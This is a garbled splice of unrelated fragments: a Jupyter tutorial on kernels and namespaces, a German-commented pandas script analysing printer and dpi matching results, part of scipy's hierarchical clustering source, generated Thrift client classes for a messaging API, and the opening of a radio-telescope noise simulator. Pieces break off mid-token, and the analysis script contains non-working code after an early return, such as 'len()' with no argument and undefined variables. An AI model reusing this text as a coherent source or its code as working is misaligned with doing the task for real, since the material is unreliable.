does it know that I want to execute code? ### Kernel <div class="alert alert-success"> The <b>kernel</b> is the thing that executes your code. It is what connects the notebook (as you see it) with the part of your computer that runs code. </div> Your kernel also stores your **namespace** - all the variables and code that you have declared (executed). It can be useful to clear and re-launch the kernel. You can do this from the 'kernel' drop down menu, at the top of your Jupyter notebook, optionally also clearing all outputs. Note that this will erase any variables that are stored in memory. ### Namespace <div class="alert alert-success"> The <b>namespace</b> is the 'place' where all your currently defined code is declared - all the things you have stored in active memory. </div> For example, when code is typed, nothing happens and the variable does *not* exist *until* the code is executed. Once executed, the variable is stored in memory within your **namespace**. # once you create a variable it's stored in your namespace my_variable = 6 Within a Jupyter notebook, you can always use the `%whos` magic command to get information about what variables have been defined in your current Namespace. For example, here, you'll see all the variables currently in our namespace. In other
["r", "s", "m", "n", "page_size", "page_margin", "cam_reso", "cap_area", "m5_size", "printer", "dpi", "num_win", "ia_id", "true_pos", "true_x", "true_y", "true_pos_dist", "index", "dbt_positions", "dbt_pos", "dbt_x", "dbt_y", "real_positions", "real_pos", "real_x", "real_y", "matching_indices", "matches", "matches_len", "error_margin", "err_margin_match", "error_radius", "err_radius_match", "runtime", "runtime_mean"] # Merge additions with main data frame (gobble up the old junk :D) sm = sm.merge(merge_df, left_index=True, right_on="ia_id")[columns] # Save to file (if filename given) if submatrix_fname is not None: sm.to_csv(submatrix_fname, index=False) # TODO: Make it create (if not present) or read (if present) and return sm return sm, raw def filter_data(): # ~6s runtime sm, raw = create_submatrix_csv() # # Performance timer # start_time = time.perf_counter() # total_time = time.perf_counter() - start_time # print(f"THIS took {total_time:.3f}s") # Drop 100 dpi values (no image analysis possible) # raw = raw.dropna() # Calculate overall_runtime_mean (Gesamtdurchschnittswert der Laufzeit) overall_runtime_mean = raw.runtime.sum() / raw.num_win.sum() print("Overall runtime mean for single submatrix (in s):") print(overall_runtime_mean) # Ist NICHT aussagekräftig weil wir die Analyse grundsätzlich beschränken # können wie wir wollen # print(raw.runtime.sum() / len(raw)) print("dpi specific runtime mean (in s):") for dpi in raw.dpi.unique(): dpi_df = raw[raw.dpi == dpi] # print("mean for single call / image analysis: ", end="") # per img analysis # print(dpi, dpi_df.runtime.sum() / len(dpi_df)) # print("mean for single submatrix: ", end="") # per submatrix print(dpi, dpi_df.runtime.sum() / dpi_df.num_win.sum()) # Filter for "good" and "bad" results # good_margin = sm[sm.err_margin_match] # bad_margin = sm[~sm.err_margin_match] good_radius = sm[sm.err_radius_match] bad_radius = sm[~sm.err_radius_match] # # Calculate margin means (Gesamtdurchschnittswert der guten/schlechten # # Ergebnisse mit Quadratauswahl) # print("Overall good results mean (margin):") # print(len(good_margin)) # count # good_margin_mean = len(good_margin) / len(sm) # mean # print(good_margin_mean) # mean # print("Overall bad results mean (margin):") # print(len(bad_margin)) # count # bad_margin_mean = len(bad_margin) / len(sm) # mean # print(bad_margin_mean) # mean # Calculate radius means (Gesamtdurchschnittswert der guten/schlechten # Ergebnisse mit Radiusauswahl) print("Overall good results mean (radius):") print(len(good_radius)) # count good_radius_mean = len(good_radius) / len(sm) # mean print(good_radius_mean) # mean # print("Overall bad results mean (radius):") # print(len(bad_radius), len(sm)) # count # bad_radius_mean = len(bad_radius) / len(sm) # mean # print(bad_radius_mean) # mean probs = {"printer": [], "dpi": [], "prob": []} # Calculate good result means for every dpi print(f"Mean for every dpi (radius)") for p_label in ["both"] + sm.printer.unique().tolist(): # filter for printer if p_label == "both": sm_p = sm good_radius_p = good_radius else: sm_p = sm[sm.printer == p_label] good_radius_p = good_radius[good_radius.printer == p_label] for dpi in sm_p.dpi.unique(): # print(f"Mean for {dpi} dpi (margin)") # good_margin_dpi = good_margin[good_margin.dpi == dpi] # print(len(good_margin_dpi), len(sm_dpi)) # count # print(len(good_margin_dpi)/len(sm_dpi)) # mean # filter for dpi sm_dpi = sm_p[sm_p.dpi == dpi] good_radius_dpi = good_radius_p[good_radius_p.dpi == dpi] # save prob probs["dpi"].append(dpi) prob = len(good_radius_dpi) / len(sm_dpi) probs["prob"].append(prob) probs["printer"].append(p_label) # print(dpi, len(good_radius_dpi), len(sm_dpi)) # count # print(len(good_radius_dpi) / len(sm_dpi)) # mean # Create probability data frame probs = pd.DataFrame(probs) print(probs) print(probs.to_latex()) # Values for diagrams dpis = raw.dpi.unique() # Prepend 100 dpi values dpis = [(100, 100)] + dpis.tolist() dpis_xs = [x for x, y in dpis] num_wins = raw.num_win.unique() num_wins = [0] + num_wins.tolist() num_win_sums = [] for dpi in raw.dpi.unique(): num_win_sums.append(raw[raw.dpi == dpi].num_win.sum()) num_win_sums = [0] + num_win_sums # TODO Do NOT use variables just use plt to continously draw a figure and # then save it with savefig("fname") (there are also LaTeX-friendly # postscript formates to export to) plt.plot(dpis_xs, num_win_sums, "--") plt.scatter(dpis_xs, num_win_sums, marker="^") plt.xlabel("Musterauflösungen (in dpi)") plt.ylabel("Anzahl Submatrizen (insgesamt)") plt.savefig("fig_dpis_num_win_sums.pdf") plt.close() plt.plot(dpis_xs, num_wins, "--") plt.scatter(dpis_xs, num_wins, marker="^") plt.xlabel("Musterauflösungen (in dpi)") plt.ylabel("Anzahl Submatrizen") plt.savefig("fig_dpis_num_wins.pdf") return # runtime_mean_complete = raw.runtime. # Probability for every dpi and split into printers # Create dictionary for creation of probability data frame probs = {"printer": [], "dpi": [], "dpi_x": [], "dpi_y": [], "nrows_margin": [], "prob_margin": [], "nrows_radius": [], "prob_radius": []} # EIN gutes ergb das mit dem bro dru gedruckt wurde und die dpi von 150 hat # p_lables = sm.printer.unique() # Iterate over printer labels (include both -> not filter) printer_labels = ["both"] + sm.printer.unique() for p_label in printer_labels: # Select printers (filter them) if p_label != "both": p_margin = good_margin[good_margin.printer == p_label] p_radius = good_radius[good_radius.printer == p_label] p_sm = sm[sm.printer == p_label] else: p_filt_margin = good_margin p_filt_radius = good_radius p_sm = sm # Iterate over dpis for dpi in sm.dpi.unique(): dpi_x, dpi_y = dpi # filter dpis # zahl der guten # Iterate over dpis for dpi in sm.dpi.unique(): dpi_x, dpi_y = dpi # Iterate over printer labels (include both -> not filter) printer_labels = ["both"] + sm.printer.unique() for p_label in printer_labels: # TODO split in good and bad? But those are complementary so it # doesn't mather too much as long as one of those is shown. if p_label != "both": # Filter for printer p_filt_margin = good_margin[good_margin.printer == p_label] p_filt_radius = good_radius[good_radius.printer == p_label] nrows_good_margin = len(good_margin) nrows_good_radius = len(good_radius) nrows = len(sm) else: nrows_margin = len() p_filter = good_margin[good_margin.printer == p_label] nrows_margin = len(good_margin[p_filter]) p_filter = good_radius[good_radius.printer == p_label] nrows_radius = len(good_radius[p_filter]) nrows() # nrows = len(p[(p.dpi == dpi)]) nrows = len(sm) prob_margin = nrows_good_margin / nrows # Fill dictionary with values probs["printer"].append(p_label) probs["dpi"].append(dpi) probs["dpi_x"].append(dpi_x) probs["dpi_y"].append(dpi_y) probs["nrows_margin"].append(nrows_margin) probs["prob_margin"].append(prob_margin) probs["nrows_radius"].append(nrows_radius) probs["prob_radius"].append(prob_radius) # Create probability data frame probs = pd.DataFrame(probs) print(probs) def create_plots(fname="raw.csv", submatrix_fname="submatrix.csv"): # ~6s runtime sm, raw = create_submatrix_csv() # Performance timer start_time = time.perf_counter() total_time = time.perf_counter() - start_time print(f"THIS took {total_time:.3f}s") # # Import raw csv # raw = pd.read_csv(fname) # transform_funcs = {"r": int, # "s": int, # "m": int, # "n": int, # "page_size": literal_eval, # "page_margin": literal_eval, # "cam_reso": literal_eval, # "cap_area": literal_eval, # "m5_size": literal_eval, # "printer": str, # "dpi": literal_eval, # "num_win": int, # "true_pos": literal_eval, # "dbt_positions": literal_eval, # "real_positions": literal_eval, # "matching_indices": literal_eval, # "runtime": float} # raw = raw.dropna().transform(transform_funcs) # # Import submatrix csv # submatrix = pd.read_csv(submatrix_fname) # transform_funcs = {"r": int, # "s": int, # "m": int, # "n": int, # "page_size": literal_eval, # "page_margin": literal_eval, # "cam_reso": literal_eval, # "cap_area": literal_eval, # "m5_size": literal_eval, # "printer": str, # "dpi": literal_eval, # "num_win": int, # "ia_id": int, # "true_pos": literal_eval, # "true_x": float, # "true_y": float, # "true_pos_dist": float, # "index": int, # "dbt_positions": literal_eval, # "dbt_pos": literal_eval, # "dbt_x": int, # "dbt_y": int, # "real_positions": literal_eval, # "real_pos": literal_eval, # "real_x": float, # "real_y": float, # "matching_indices": literal_eval, # "matches": literal_eval, # "matches_len": float, # "error_margin": int, # "err_margin_match": bool, # "error_radius": int, # "err_radius_match": bool, # "runtime": float, # "runtime_mean": float} # submatrix = submatrix.transform(transform_funcs) df = sm # probability "correct"/expected position of every printer and dpi (w/o # 100) probs = {"printer": [], "dpi": [], "prob": []} for p_label in df.printer.unique(): p = df[df.printer == p_label] for dpi in p.dpi.unique(): nrows_exp = len(p[(p.dpi == dpi) & p.err_margin_match]) nrows = len(p[(p.dpi == dpi)]) prob = nrows_exp / nrows probs["printer"].append(p_label) probs["dpi"].append(dpi) probs["prob"].append(prob) probs = pd.DataFrame(probs) print(probs) # Maybe create a plot with the probability on the y axis and the dpi from # 100 to 400 on the x axis ideal_pos = {"x": [], "y": []} for p in df["true_pos"].unique(): ideal_pos["x"].append(p[0]) ideal_pos["y"].append(p[1]) ideal_pos = pd.DataFrame(ideal_pos) plt.scatter(ideal_pos["x"], ideal_pos["y"]).get_figure().show() # Maybe try to "connect" ideal positions with measured x and y values. # df[(df.dpi == (125, 125)) & (df.printer == "LexmarkMS510dn") & # df.err_margin_match] for p_label in ["LexmarkMS510dn"]: # df.printer.unique(): p = df[df.printer == p_label] for dpi in [(125, 125)]: # p.dpi.unique(): f = p[(p.dpi == dpi) & p.err_margin_match] f_inv = p[(p.dpi == dpi) & p.err_margin_match.apply(lambda x: not x)] plt.scatter(f_inv["x"], f_inv["y"]).get_figure().show() plt.scatter(f["x"], f["y"]).get_figure().show() # Draw scatter plots over each other # All X and Y positions # plt.scatter(df_pos["x"], df_pos["y"]).get_figure().show() # Only "correct" positions # filtered_inv = df_pos[df_pos["err_margin_match"].apply(lambda x: not x)] # filtered = df_pos[df_pos["err_margin_match"]] # plt.scatter(filtered_inv["x"], filtered_inv["y"]).get_figure().show() # plt.scatter(filtered["x"], filtered["y"]).get_figure().show() # print(df_pos[df_pos["err_margin_match"]]) # print(df_pos[df_pos["err_margin_match"] & # df_pos["matches"].apply(lambda x: x != [])]) # print(df_pos[(df_pos["index"] == 0) & (df_pos["ia_id"] == 1799)]) # print(df_pos[pd.notna(df_pos["matches"]) & #
name='Z') y = _convert_to_double(np.asarray(y, order='c')) if y.ndim == 1: distance.is_valid_y(y, throw=True, name='y') [y] = _copy_arrays_if_base_present([y]) elif y.ndim == 2: if y.shape[0] == y.shape[1] and np.allclose(np.diag(y), 0): if np.all(y >= 0) and np.allclose(y, y.T): _warning('The symmetric non-negative hollow observation ' 'matrix looks suspiciously like an uncondensed ' 'distance matrix') y = distance.pdist(y, metric) else: raise ValueError("`y` must be 1 or 2 dimensional.") if not np.all(np.isfinite(y)): raise ValueError("The condensed distance matrix must contain only " "finite values.") return _optimal_leaf_ordering.optimal_leaf_ordering(Z, y) def _convert_to_bool(X): if X.dtype != bool: X = X.astype(bool) if not X.flags.contiguous: X = X.copy() return X def _convert_to_double(X): if X.dtype != np.double: X = X.astype(np.double) if not X.flags.contiguous: X = X.copy() return X def cophenet(Z, Y=None): """ Calculate the cophenetic distances between each observation in the hierarchical clustering defined by the linkage ``Z``. Suppose ``p`` and ``q`` are original observations in disjoint clusters ``s`` and ``t``, respectively and ``s`` and ``t`` are joined by a direct parent cluster ``u``. The cophenetic distance between observations ``i`` and ``j`` is simply the distance between clusters ``s`` and ``t``. Parameters ---------- Z : ndarray The hierarchical clustering encoded as an array (see `linkage` function). Y : ndarray (optional) Calculates the cophenetic correlation coefficient ``c`` of a hierarchical clustering defined by the linkage matrix `Z` of a set of :math:`n` observations in :math:`m` dimensions. `Y` is the condensed distance matrix from which `Z` was generated. Returns ------- c : ndarray The cophentic correlation distance (if ``Y`` is passed). d : ndarray The cophenetic distance matrix in condensed form. The :math:`ij` th entry is the cophenetic distance between original observations :math:`i` and :math:`j`. See Also -------- linkage : for a description of what a linkage matrix is. scipy.spatial.distance.squareform : transforming condensed matrices into square ones. Examples -------- >>> from scipy.cluster.hierarchy import single, cophenet >>> from scipy.spatial.distance import pdist, squareform Given a dataset ``X`` and a linkage matrix ``Z``, the cophenetic distance between two points of ``X`` is the distance between the largest two distinct clusters that each of the points: >>> X = [[0, 0], [0, 1], [1, 0], ... [0, 4], [0, 3], [1, 4], ... [4, 0], [3, 0], [4, 1], ... [4, 4], [3, 4], [4, 3]] ``X`` corresponds to this dataset :: x x x x x x x x x x x x >>> Z = single(pdist(X)) >>> Z array([[ 0., 1., 1., 2.], [ 2., 12., 1., 3.], [ 3., 4., 1., 2.], [ 5., 14., 1., 3.], [ 6., 7., 1., 2.], [ 8., 16., 1., 3.], [ 9., 10., 1., 2.], [11., 18., 1., 3.], [13., 15., 2., 6.], [17., 20., 2., 9.], [19., 21., 2., 12.]]) >>> cophenet(Z) array([1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 2., 2., 2., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 1., 1., 1.]) The output of the `scipy.cluster.hierarchy.cophenet` method is represented in condensed form. We can use `scipy.spatial.distance.squareform` to see the output as a regular matrix (where each element ``ij`` denotes the cophenetic distance between each ``i``, ``j`` pair of points in ``X``): >>> squareform(cophenet(Z)) array([[0., 1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.], [1., 0., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.], [1., 1., 0., 2., 2., 2., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 0., 1., 1., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 1., 0., 1., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 1., 1., 0., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 0., 1., 1., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 1., 0., 1., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 1., 1., 0., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 2., 2., 2., 0., 1., 1.], [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 0., 1.], [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 0.]]) In this example, the cophenetic distance between points on ``X`` that are very close (i.e., in the same corner) is 1. For other pairs of points is 2, because the points will be located in clusters at different corners - thus, the distance between these clusters will be larger. """ Z = np.asarray(Z, order='c') is_valid_linkage(Z, throw=True, name='Z') Zs = Z.shape n = Zs[0] + 1 zz = np.zeros((n * (n-1)) // 2, dtype=np.double) # Since the C code does not support striding using strides. # The dimensions are used instead. Z = _convert_to_double(Z) _hierarchy.cophenetic_distances(Z, zz, int(n)) if Y is None: return zz Y = np.asarray(Y, order='c') distance.is_valid_y(Y, throw=True, name='Y') z = zz.mean() y = Y.mean() Yy = Y - y Zz = zz - z numerator = (Yy * Zz) denomA = Yy**2 denomB = Zz**2 c = numerator.sum() / np.sqrt((denomA.sum() * denomB.sum())) return (c, zz) def inconsistent(Z, d=2): r""" Calculate inconsistency statistics on a linkage matrix. Parameters ---------- Z : ndarray The :math:`(n-1)` by 4 matrix encoding the linkage (hierarchical clustering). See `linkage` documentation for more information on its form. d : int, optional The number of links up to `d` levels below each non-singleton cluster. Returns ------- R : ndarray A :math:`(n-1)` by 4 matrix where the ``i``'th row contains the link statistics for the non-singleton cluster ``i``. The link statistics are computed over the link heights for links :math:`d` levels below the cluster ``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard deviation of the link heights, respectively; ``R[i,2]`` is the number of links included in the calculation; and ``R[i,3]`` is the inconsistency coefficient, .. math:: \frac{\mathtt{Z[i,2]} - \mathtt{R[i,0]}} {R[i,1]} Notes ----- This function behaves similarly to the MATLAB(TM) ``inconsistent`` function. Examples -------- >>> from scipy.cluster.hierarchy import inconsistent, linkage >>> from matplotlib import pyplot as plt >>> X = [[i] for i in [2, 8, 0, 4, 1, 9, 9, 0]] >>> Z = linkage(X, 'ward') >>> print(Z) [[ 5. 6. 0. 2. ] [ 2. 7. 0. 2. ] [ 0. 4. 1. 2. ] [ 1. 8. 1.15470054 3. ] [ 9. 10. 2.12132034 4. ] [ 3. 12. 4.11096096 5. ] [11. 13. 14.07183949 8. ]] >>> inconsistent(Z) array([[ 0. , 0. , 1. , 0. ], [ 0. , 0. , 1. , 0. ], [ 1. , 0. , 1. , 0. ], [ 0.57735027, 0.81649658, 2. , 0.70710678], [ 1.04044011, 1.06123822, 3. , 1.01850858], [ 3.11614065, 1.40688837, 2. , 0.70710678], [ 6.44583366, 6.76770586, 3. , 1.12682288]]) """ Z = np.asarray(Z, order='c') Zs = Z.shape is_valid_linkage(Z, throw=True, name='Z') if (not d == np.floor(d)) or d < 0: raise ValueError('The second argument d must be a nonnegative ' 'integer value.') # Since the C code does not support striding using strides. # The dimensions are used instead. [Z] = _copy_arrays_if_base_present([Z]) n = Zs[0] + 1 R = np.zeros((n - 1, 4), dtype=np.double) _hierarchy.inconsistent(Z, R, int(n), int(d)) return R def from_mlab_linkage(Z): """ Convert a linkage matrix generated by MATLAB(TM) to a new linkage matrix compatible with this module. The conversion does two things: * the indices are converted from ``1..N`` to ``0..(N-1)`` form, and * a fourth column ``Z[:,3]`` is added where ``Z[i,3]`` represents the number of original observations (leaves) in the non-singleton cluster ``i``. This function is useful when loading in linkages from legacy data files generated by MATLAB. Parameters ---------- Z : ndarray A linkage matrix generated by MATLAB(TM). Returns ------- ZS : ndarray A linkage matrix compatible with ``scipy.cluster.hierarchy``. See Also -------- linkage : for a description of what a linkage matrix is.
__ne__(self, other): return not (self == other) class getAllContactIdsForChannel_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_, elem1068) = iprot.readListBegin() for _ in range(elem1068): elem1069 = iprot.readString() self.success.append(elem1069) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getAllContactIdsForChannel_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRING, len(self.success)) for elem1070 in self.success: oprot.writeString(elem1070) oprot.writeListEnd() oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class displayBuddySubscriberCount_args(object): def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('displayBuddySubscriberCount_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class displayBuddySubscriberCount_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.I64: self.success = iprot.readI64() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('displayBuddySubscriberCount_result') if self.success is not None: oprot.writeFieldBegin('success', TType.I64, 0) oprot.writeI64(self.success) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getProfileForChannel_args(object): def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getProfileForChannel_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getProfileForChannel_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = Profile() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getProfileForChannel_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getUserTickets_args(object): """ Attributes: - userMids """ def __init__(self, userMids=None): self.userMids = userMids def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.LIST: self.userMids = [] (_, elem1071) = iprot.readListBegin() for _ in range(elem1071): elem1072 = iprot.readString() self.userMids.append(elem1072) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getUserTickets_args') if self.userMids is not None: oprot.writeFieldBegin('userMids', TType.LIST, 1) oprot.writeListBegin(TType.STRING, len(self.userMids)) for elem1073 in self.userMids: oprot.writeString(elem1073) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.userMids)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getUserTickets_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_, elem1074) = iprot.readListBegin() for _ in range(elem1074): elem1075 = UserTicketResponse() elem1075.read(iprot) self.success.append(elem1075) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getUserTickets_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRUCT, len(self.success)) for elem1076 in self.success: elem1076.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getOAFriendMids_args(object): def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getOAFriendMids_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getOAFriendMids_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_, elem1077) = iprot.readListBegin() for _ in range(elem1077): elem1078 = iprot.readString() self.success.append(elem1078) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getOAFriendMids_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRING, len(self.success)) for elem1079 in self.success: oprot.writeString(elem1079) oprot.writeListEnd() oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class searchPaidCallUserRate_args(object): """ Attributes: - countryCode - language """ def __init__(self, countryCode=None, language=None): self.countryCode = countryCode self.language = language def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 2: if ftype == TType.STRING: self.countryCode = iprot.readString() else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.language = iprot.readString() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('searchPaidCallUserRate_args') if self.countryCode is not None: oprot.writeFieldBegin('countryCode',
"""PUMA Noise simulator Follows https://arxiv.org/abs/1810.09572. Includes a general RadioTelescope class that defines a telescope in terms of various dish, packing, and instrumental noise properties, as well as instances of this class for the full and petite configurations of PUMA (see https://arxiv.org/abs/1907.12559). All spatial units are Mpc, not Mpc/h !! """ import numpy as np from .castorina import castorinaBias,castorinaPn import pyccl as ccl class RadioTelescope: """Class for computing signal and noise properties of a radio telescope. Uses signal and noise models from Appendices B and D of the Cosmic Visions 21cm white paper, https://arxiv.org/pdf/1810.09572v3.pdf. Attributes ---------- C : ccl.Cosmology class CCL class defining the background cosmology. Nside : int, optional Number of receivers per side of square array (default: 256) D : float, optional Physical diameter of dishes, in m (default: 6) tint : float, optional Integration time of survey, in y (default: 5) fsky : float, optional Observed sky fraction (default: 0.5) effic : float, optional Dish aperture efficiency factor, such that the effective dish area is A_eff = effic * A_phys (default: 0.7) Tampl : float, optional Amplifier noise temperature, in K (default: 50) Tground : float, optional Ground temperature, in K (default: 300) omtcoupling : float, optional Optical efficiency of receivers, which boosts the 